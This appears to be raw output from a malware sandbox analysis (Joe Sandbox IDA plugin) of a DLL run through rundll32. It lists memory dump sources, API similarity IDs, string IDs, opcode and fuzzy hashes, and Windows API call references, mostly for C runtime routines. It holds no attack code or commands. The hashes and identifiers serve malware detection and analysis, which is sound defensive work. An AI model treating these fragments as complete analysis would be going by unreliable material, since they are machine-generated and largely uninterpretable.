• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                            • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                            • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                            • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                            • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                            • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                            • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                            • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                            • Instruction ID: b4b3ab6b1088bd05896873025a869169f262880e2f39a8d17b8af41b45206a1e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6218231601A4881FAA6CB16A9057A973A4BB4CBF0F5C8735FE2D47BD1EF38C6499300
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-537541572
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-537541572
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                                                                            • Opcode ID: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                            • Instruction ID: 09ad68218d141e964a4945e14ce8a54b78ee7b9198dbdf3b1dfc829bb6e04cef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7719D72610B98C9FB92CFA4E8803EC37A1F349795F61C016EA891B795DF79C659C301
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 3523768491-393685449
                                                                                                                                                                                                                            • Opcode ID: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                            • Instruction ID: f316bf09ab0905bbfcd6d3bf85c0ee5a6f9e6efb4081dae354aa448471526a42
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8E1AE725047888AE7A2DF78D4803ED7BA1F759788F148226FF8957696CF34C689CB01
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                            • Instruction ID: a236a635390231764599b441ca33359ecfb18b4257108ec610f8a3aa5a970b1f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01118E30204E4846F6D6632155A53FD5242BB4C7F9F15C724F876177C6EE288B095749
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                            • API String ID: 2943138195-757766384
                                                                                                                                                                                                                            • Opcode ID: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                            • Instruction ID: 4038f050409aa154ac6b01109c2d1ae91dabd18faee6e66f8a741a0bb842cd02
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2716A76701B4898EB968F68D8503EC66B5B30D7C4F94C529FA5907BA6DF39C3A8C340
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                                                                            • String ID: `template-parameter$void
                                                                                                                                                                                                                            • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                            • Opcode ID: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                            • Instruction ID: 6b3cef5dec8401bd2ebba64d188ad0518e1c0495917126e62d011a98b4116422
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5414D32700F5888FB92CBA4E8513ED2371BB5C7C8F959125EE092BB95DF78864AC340
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 826178784-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
Memory Dump Source
• Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                            • Instruction ID: e93ad22c6cc443ae94773b33ba4779df2cc7973ffbf2f88c150105d93498b686
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118E30205E4845FADA672195D63FD22417B4C7F9F0AC724B83A066D6EE28CB29574A
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                            • Instruction ID: 894476b8d09a22a5dbe3d770f39793525e4cc36c43d7413f8e4abc8b3aeea73a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1115470314E0985FADAA73554E27FD12816B8C7F9F19CB24B936062C6ED38CB486749
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                            • Instruction ID: e86eebddfadbf209218566a74c72582cf7fff1bf59de2877caf13f980550ab1d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B113030204E0D09FADB632144A67FD12416F4D3FEF1ACB28B8350A2C2ED389B096799
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                            • Instruction ID: 586806abb7160c1286a1b2c9858a8c81ad64b0ece563cba21c458cc6968070c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21110C30604E0949FADB637144A67FD11417F8D3FEF1ACB24B836062D2EE289B096789
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                            • Instruction ID: 603ec2f23fa6d6c6a25bd3aeda4f846d3f0b7b81b5b2ff33ca2fe6bf8accc470
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63917F73614B888AE792DB65E8903DD7BA0F3497C8F14811AFB8957755DF38C299CB00
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                            • Instruction ID: dfb6a33e339ab0c6007a7a63b5c9da813757f51a8917a400a443b559987f5a56
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43615032508BC886E7A2DF15E4407DAB7A0F7897D8F048216FB9857B95DF78D298CB10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
